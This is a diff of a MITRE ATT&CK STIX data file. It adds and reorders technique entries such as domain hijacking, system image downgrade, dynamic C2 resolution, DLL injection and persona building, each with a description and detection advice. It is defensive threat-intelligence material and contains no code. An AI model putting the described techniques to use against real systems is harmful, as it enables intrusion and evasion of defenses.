+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domains", + "description": "Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)", + "id": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-19T01:28:56.664Z", + "created": "2020-10-01T00:51:28.513Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1601.002", + "url": "https://attack.mitre.org/techniques/T1601/002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-22T17:49:02.660Z", + "created": "2020-10-19T19:53:10.576Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_data_sources": [ + "Network device configuration", + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ] + }, { "id": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -8789,9 +10444,9 @@ "url": "https://attack.mitre.org/techniques/T1574/004" }, { - "external_id": "CAPEC-CAPEC", + "external_id": "CAPEC-471", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/CAPEC.html" + "url": "https://capec.mitre.org/data/definitions/471.html" }, { "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf", @@ -8819,7 +10474,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:06:47.115Z", + "modified": "2020-09-16T16:48:09.391Z", "created": "2020-03-16T15:23:30.896Z", "x_mitre_platforms": [ "macOS" @@ -8970,22 +10625,6 @@ ] }, { - "created": "2020-03-10T17:28:11.747Z", - "modified": "2020-03-27T20:54:28.560Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "type": "attack-pattern", - "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", - "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", - "name": "Dynamic Resolution", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -9013,34 +10652,56 @@ "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." } ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_permissions_required": [ - "User" + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } ], - "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.0", + "modified": "2020-10-02T01:37:39.938Z", + "created": "2020-03-10T17:28:11.747Z", + "x_mitre_contributors": [ + "Chris Roffe" + ], + "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", "x_mitre_data_sources": [ "SSL/TLS inspection", "Web logs", "DNS records" ], - "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", - "x_mitre_contributors": [ - "Chris Roffe" + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ] }, { - "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", - "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", - "name": "Dynamic-link Library Injection", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2020-01-14T01:26:08.145Z", + "modified": "2020-06-20T22:17:59.148Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } ], + "type": "attack-pattern", "external_references": [ { "source_name": "mitre-attack", @@ -9058,27 +10719,16 @@ "source_name": "Endgame HuntingNMemory June 2017" } ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "modified": "2020-06-20T22:17:59.148Z", - "created": "2020-01-14T01:26:08.145Z", - "x_mitre_platforms": [ - "Windows" - ], - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", - "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", - "x_mitre_permissions_required": [ - "User" + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic-link Library Injection", + "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" ], "x_mitre_data_sources": [ "Process monitoring", @@ -9086,9 +10736,14 @@ "File monitoring", "API monitoring" ], - "x_mitre_defense_bypassed": [ - "Application control", - "Anti-virus" + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" ] }, { @@ -9252,6 +10907,124 @@ "Office 365" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1585.002", + "url": "https://attack.mitre.org/techniques/T1585/002" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "source_name": "Trend Micro R980 2016", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/", + "description": "Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Email Accounts", + "description": "Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)", + "id": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-14T00:48:47.515Z", + "created": "2020-10-01T01:09:53.217Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1586.002", + "url": "https://attack.mitre.org/techniques/T1586/002" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Email Accounts", + "description": "Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", + "id": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-20T16:40:58.761Z", + "created": "2020-10-01T01:20:53.104Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1589.002", + "url": "https://attack.mitre.org/techniques/T1589/002" + }, + { + "source_name": "HackersArise Email", + "url": "https://www.hackers-arise.com/email-scraping-and-maltego", + "description": "Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020." + }, + { + "source_name": "CNET Leaks", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Email Addresses", + "description": "Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:46:04.662Z", + "created": "2020-10-02T14:56:24.866Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -9336,7 +11109,7 @@ "phase_name": "collection" } ], - "modified": "2020-03-24T18:29:48.994Z", + "modified": "2020-10-19T22:43:45.509Z", "created": "2020-02-19T18:54:47.103Z", "x_mitre_contributors": [ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)" @@ -9448,6 +11221,42 @@ "macOS" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1589.003", + "url": "https://attack.mitre.org/techniques/T1589/003" + }, + { + "source_name": "OPM Leak", + "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/", + "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Employee Names", + "description": "Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "id": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:46:29.173Z", + "created": "2020-10-02T14:57:15.906Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "created": "2020-03-16T15:33:01.739Z", "modified": "2020-03-30T00:37:16.809Z", @@ -9576,7 +11385,7 @@ "phase_name": "impact" } ], - "modified": "2020-03-29T02:07:27.676Z", + "modified": "2020-09-16T15:56:03.459Z", "created": "2019-04-18T11:00:55.862Z", "x_mitre_is_subtechnique": false, "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", @@ -9688,12 +11497,76 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1585", + "url": "https://attack.mitre.org/techniques/T1585" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Establish Accounts", + "description": "Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)", + "id": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:20:40.675Z", + "created": "2020-10-01T01:05:42.216Z", + "x_mitre_data_sources": [ + "Social media monitoring" + ], + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { "source_name": "mitre-attack", "external_id": "T1546", "url": "https://attack.mitre.org/techniques/T1546" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "source_name": "FireEye WMI 2015" + }, + { + "url": "https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "source_name": "Malware Persistence on OS X" + }, + { + "url": "https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "description": "Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.", + "source_name": "amnesia malware" } ], "object_marking_refs": [ @@ -9701,7 +11574,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Event Triggered Execution", - "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked. \n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", + "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", "id": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "type": "attack-pattern", "kill_chain_phases": [ @@ -9714,9 +11587,9 @@ "phase_name": "persistence" } ], - "modified": "2020-07-09T13:55:51.501Z", + "modified": "2020-10-21T18:48:27.576Z", "created": "2020-01-22T21:04:23.285Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": false, "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ", "x_mitre_data_sources": [ @@ -9823,7 +11696,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Executable Installer File Permissions Weakness", - "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include 